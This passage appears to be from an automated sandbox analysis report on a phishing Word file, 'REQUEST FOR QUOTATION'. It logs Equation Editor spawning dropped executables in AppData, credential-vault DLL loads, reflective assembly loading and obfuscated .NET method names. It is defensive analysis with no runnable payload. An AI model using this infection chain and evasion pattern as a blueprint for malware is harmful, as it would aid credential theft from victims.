                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess created: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe "C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe"
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\html.exe "C:\Users\user\AppData\Roaming\html.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess created: C:\Users\user\AppData\Roaming\html.exe "C:\Users\user\AppData\Roaming\html.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess created: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe "C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe"Jump to behavior
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess created: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe "C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe"
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: wow64win.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: wow64cpu.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: bcrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: shfolder.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: rpcrtremote.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: wow64win.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: wow64cpu.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: bcrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: wbemcomn2.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: rpcrtremote.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: ntdsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: credssp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: wow64win.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: wow64cpu.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: bcrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: rpcrtremote.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: wow64win.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: wow64cpu.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: bcrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: wbemcomn2.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: rpcrtremote.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: ntdsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: credssp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: wow64win.dll
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: wow64cpu.dll
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: bcrypt.dll
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: rpcrtremote.dll
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: wow64win.dll
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: wow64cpu.dll
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: bcrypt.dll
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: wbemcomn2.dll
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: rpcrtremote.dll
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: ntdsapi.dll
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: webio.dll
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: credssp.dll
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeSection loaded: vaultcli.dll
                      Source: C:\Users\user\AppData\Roaming\html.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                      Source: REQUEST FOR QUOTATION.docx.LNK.0.drLNK file: ..\..\..\..\..\Desktop\REQUEST FOR QUOTATION.docx.doc
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Roaming\html.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: REQUEST FOR QUOTATION.docx.docInitial sample: OLE zip file path = word/embeddings/oleObject7.bin
                      Source: REQUEST FOR QUOTATION.docx.docInitial sample: OLE zip file path = word/media/image2.emf
                      Source: REQUEST FOR QUOTATION.docx.docInitial sample: OLE zip file path = word/embeddings/oleObject5.bin
                      Source: REQUEST FOR QUOTATION.docx.docInitial sample: OLE zip file path = word/embeddings/oleObject6.bin
                      Source: REQUEST FOR QUOTATION.docx.docInitial sample: OLE zip file path = word/embeddings/oleObject3.bin
                      Source: REQUEST FOR QUOTATION.docx.docInitial sample: OLE zip file path = word/embeddings/oleObject4.bin
                      Source: REQUEST FOR QUOTATION.docx.docInitial sample: OLE zip file path = word/embeddings/oleObject2.bin
                      Source: REQUEST FOR QUOTATION.docx.docInitial sample: OLE zip file path = word/_rels/settings.xml.rels
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: Binary string: lGeIZ.pdbSHA256) source: EQNEDT32.EXE, 00000008.00000003.379830677.000000000A7E1000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe.10.dr, html.exe.8.dr, html[1].exe.8.dr
                      Source: Binary string: lGeIZ.pdb source: EQNEDT32.EXE, 00000008.00000003.379830677.000000000A7E1000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe.10.dr, html.exe.8.dr, html[1].exe.8.dr
                      Source: REQUEST FOR QUOTATION.docx.docInitial sample: OLE indicators vbamacros = False

                      Data Obfuscation

                      barindex
                      Source: 9.2.html.exe.4f0000.2.raw.unpack, XG.cs.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
                      Source: 9.2.html.exe.28cf3d0.6.raw.unpack, XG.cs.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
                      Source: 9.2.html.exe.330000.0.raw.unpack, -.cs.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
                      Source: 9.2.html.exe.5e60000.12.raw.unpack, sqh1bsK2vmbKu3bQAB.cs.Net Code: JQN64AOHtZ System.Reflection.Assembly.Load(byte[])
                      Source: 9.2.html.exe.3889550.8.raw.unpack, -.cs.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
                      Source: 9.2.html.exe.3bf41c0.11.raw.unpack, sqh1bsK2vmbKu3bQAB.cs.Net Code: JQN64AOHtZ System.Reflection.Assembly.Load(byte[])
                      Source: html[1].exe.8.drStatic PE information: 0xD5E299B3 [Fri Sep 17 09:04:51 2083 UTC]
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 11_2_041D4A62 pushfd ; iretd 11_2_041D4A63
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 11_2_041D4A88 pushfd ; iretd 11_2_041D4A8A
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 11_2_041D4AB0 pushfd ; iretd 11_2_041D4AB1
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 11_2_041D4ADE pushfd ; iretd 11_2_041D4AE0
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 11_2_041D3582 push FFFFFFB1h; iretd 11_2_041D3584
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 16_2_004509AE push esp; ret 16_2_004509B1
                      Source: html[1].exe.8.drStatic PE information: section name: .text entropy: 7.974040091751685
                      Source: html.exe.8.drStatic PE information: section name: .text entropy: 7.974040091751685
                      Source: 9.2.html.exe.4f0000.2.raw.unpack, XG.csHigh entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
                      Source: 9.2.html.exe.5e60000.12.raw.unpack, kVWBZIYGc1LsJp5DQC.csHigh entropy of concatenated method names: 'zD14Z7WcE', 'aY2g3LtAi', 'RAtPTM3MA', 'gVDtcvhDa', 'sLSNk4svb', 'DcRXfOqYj', 'FXmjulmWVmfYLi21Oc', 'gQZfR5kDT1mXABj1ut', 'd2gU3afqw', 'RONZ9wucu'
                      Source: 9.2.html.exe.5e60000.12.raw.unpack, PG32fLbBvBC9PvSoKS.csHigh entropy of concatenated method names: 'j45kgXNccs', 'hYgkPuBayc', 'm8Gk9g0y4O', 'yfukNfxyGw', 'aWOk7b1H5O', 'JnCkWHYtDS', 'JNtkGH2qeg', 'GJUkUPpWyH', 'NnMkAWnliM', 'nLbkZ72F5f'
                      Source: 9.2.html.exe.5e60000.12.raw.unpack, uXn2oFWUJpYUoMT4q5.csHigh entropy of concatenated method names: 'dr4Gs83GRi', 'oJyGiPP4es', 'HMfUCmhs6o', 'FtbUFblDEj', 'BclGO0MmLj', 'nHSG0u2IJ2', 'hFMG3tT10B', 'NW5GruvZps', 'pkHGQWjRMj', 'kIPGdheVEc'
                      Source: 9.2.html.exe.5e60000.12.raw.unpack, UWRVFXGi90YJhK0jor.csHigh entropy of concatenated method names: 'dfNUYfQCFj', 'wEPUTiOkcE', 'pFRUlkCxTA', 'fi3UMLcvpj', 'goLUr9Zqg4', 'ioEUngA4yI', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 9.2.html.exe.5e60000.12.raw.unpack, HpK0UKqYTXMkNldgkl.csHigh entropy of concatenated method names: 'lbGAFX8UUh', 'NGEAmKFdac', 'VCrA6dwFQ6', 'FACADN6uk2', 'jutABwb9K4', 'puUAaWwScP', 'XieAJA7ufc', 'cYNUHZHhQY', 'U0dUs1aLBs', 'IrpUwkWRTH'
                      Source: 9.2.html.exe.5e60000.12.raw.unpack, BLOAyHyYSiUZUlxD9k.csHigh entropy of concatenated method names: 'PX0V9CtgVk', 'eS1VNRQh9X', 'LmwVY5vbYS', 'ERkVTAcsCl', 'Gj7VMFViKJ', 'WA0VnxbCYa', 'hLfVc6Jki3', 'LscVKJjLvv', 'J8KVEgoRDY', 'WQSVODqTjE'
                      Source: 9.2.html.exe.5e60000.12.raw.unpack, zHtxCJ1N2JoO48Z6lI.csHigh entropy of concatenated method names: 'OGTG2Ght1E', 'ddhG50ueeN', 'ToString', 'zHHGDd9YpT', 'zWRGB8iwOh', 'PJFGkRTxGi', 'mbkGa0whWA', 'EoFGJbYNQY', 'lraGxylQAo', 'vrcGoHBw7s'
                      Source: 9.2.html.exe.5e60000.12.raw.unpack, J38WN0MuLBWdDdXjtWo.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uEwZrb5DAM', 'NtUZQiG1kG', 'QwFZdmNvQ0', 'kSuZeDupbq', 'HL2ZyB4HNI', 'HxTZqfwGh1', 'ugGZHDX7xH'
                      Source: 9.2.html.exe.5e60000.12.raw.unpack, O12eRO598n0U73Lpkf.csHigh entropy of concatenated method names: 'zrGJfDk0FH', 'VXjJB4JmrI', 'yu1Jap9Rr7', 'kolJxOAD4J', 'HecJowBvsI', 'VHxaywAt3h', 'mMWaq2edhS', 'LCTaHTcm4q', 'ikDasicJMB', 'inrawZ13ok'
                      Source: 9.2.html.exe.5e60000.12.raw.unpack, udHJLbJbS6nBCo8rlA.csHigh entropy of concatenated method names: 'Dispose', 'NELFwrbqWp', 'k1ORTg5VMs', 'jb5vvpb8Yp', 'og3Firus1T', 'b6dFz6oR6d', 'ProcessDialogKey', 'xbaRC78q29', 'eAgRFZODXk', 'bUMRRWavoA'
                      Source: 9.2.html.exe.5e60000.12.raw.unpack, uqwCXNwbcnMqM8iwfa.csHigh entropy of concatenated method names: 'UANUDVPPrB', 'a5bUBCEr9d', 'K2XUk1Zlvy', 'KSvUaUwMh2', 'py7UJginwy', 'wv1UxR7V5E', 'tD7UoxvDwY', 'HYGUStojtp', 'LcHU26kFqU', 'xLAU55dxLu'
                      Source: 9.2.html.exe.5e60000.12.raw.unpack, sqh1bsK2vmbKu3bQAB.csHigh entropy of concatenated method names: 'YOhmfdii8W', 'UUcmDiqBva', 's07mBv3J2t', 'NYfmkxvuiJ', 'pwXma7TJBL', 'lh6mJp0TDL', 'SHdmxQyV6j', 'iq6mou4qT8', 'YgxmSQUYSe', 'gxtm2TOB9u'
                      Source: 9.2.html.exe.5e60000.12.raw.unpack, jBDgLqMLPkY7tSbGPhJ.csHigh entropy of concatenated method names: 'UbkA8ULCYc', 'GAIAjHkMHE', 'QHdA48iXuW', 'qXMAgthhYo', 'mYuAuZIvLM', 'TdNAPcme8P', 'BmkAt2Joed', 'zPoA9HjHPV', 'lHiANABDTT', 'WyYAXuRUpR'
                      Source: 9.2.html.exe.5e60000.12.raw.unpack, OrnLL9jIcMuvJxc1rQ.csHigh entropy of concatenated method names: 'UmIx8QbjjA', 'VCYxjXon6U', 'XABx47BWUG', 'ShtxgB0U62', 'nHrxuVthfm', 'VjaxPQGXpm', 'EQcxtG3LYP', 'fT3x9KKs5V', 'KbaxN38aOR', 'okGxX0sWwN'
                      Source: 9.2.html.exe.5e60000.12.raw.unpack, PcBFR2elvHTvWr6EEl.csHigh entropy of concatenated method names: 'kA4FxQoxrD', 'luVFosHmNS', 'uFkF2SPtJs', 'vqxF5Vltel', 'XOVF7bB7V9', 'TV2FW9A7DQ', 'YaIloHVSSArgSTFZUG', 'CbEZQfntQjCbJUg9yA', 'Ev0FFAQnkC', 'dReFmlejo7'
                      Source: 9.2.html.exe.5e60000.12.raw.unpack, JmsVQYzgcRFt7cT77K.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PCOAVKvFXb', 'mckA7XpmIr', 'LtNAWyaBtw', 'HDVAGSlNmt', 'j4rAUtwTby', 'xHhAAkNrk9', 'Tk0AZj0QKX'
                      Source: 9.2.html.exe.5e60000.12.raw.unpack, SKNwGsNRwam5llK5t6.csHigh entropy of concatenated method names: 'vBeBr8LZD6', 'PsKBQhgKqq', 'ihJBdmbEb6', 'oxuBewBsvC', 'jKRByn7kxv', 'pKDBqp2hum', 'MhOBHtnVv2', 'IF5Bsspd5p', 'jYEBw3TNWk', 'LX7BijH1ap'
                      Source: 9.2.html.exe.28cf3d0.6.raw.unpack, XG.csHigh entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
                      Source: 9.2.html.exe.3bf41c0.11.raw.unpack, kVWBZIYGc1LsJp5DQC.csHigh entropy of concatenated method names: 'zD14Z7WcE', 'aY2g3LtAi', 'RAtPTM3MA', 'gVDtcvhDa', 'sLSNk4svb', 'DcRXfOqYj', 'FXmjulmWVmfYLi21Oc', 'gQZfR5kDT1mXABj1ut', 'd2gU3afqw', 'RONZ9wucu'
                      Source: 9.2.html.exe.3bf41c0.11.raw.unpack, PG32fLbBvBC9PvSoKS.csHigh entropy of concatenated method names: 'j45kgXNccs', 'hYgkPuBayc', 'm8Gk9g0y4O', 'yfukNfxyGw', 'aWOk7b1H5O', 'JnCkWHYtDS', 'JNtkGH2qeg', 'GJUkUPpWyH', 'NnMkAWnliM', 'nLbkZ72F5f'
                      Source: 9.2.html.exe.3bf41c0.11.raw.unpack, uXn2oFWUJpYUoMT4q5.csHigh entropy of concatenated method names: 'dr4Gs83GRi', 'oJyGiPP4es', 'HMfUCmhs6o', 'FtbUFblDEj', 'BclGO0MmLj', 'nHSG0u2IJ2', 'hFMG3tT10B', 'NW5GruvZps', 'pkHGQWjRMj', 'kIPGdheVEc'
                      Source: 9.2.html.exe.3bf41c0.11.raw.unpack, UWRVFXGi90YJhK0jor.csHigh entropy of concatenated method names: 'dfNUYfQCFj', 'wEPUTiOkcE', 'pFRUlkCxTA', 'fi3UMLcvpj', 'goLUr9Zqg4', 'ioEUngA4yI', 'Next', 'Next', 'Next', 'NextBytes'
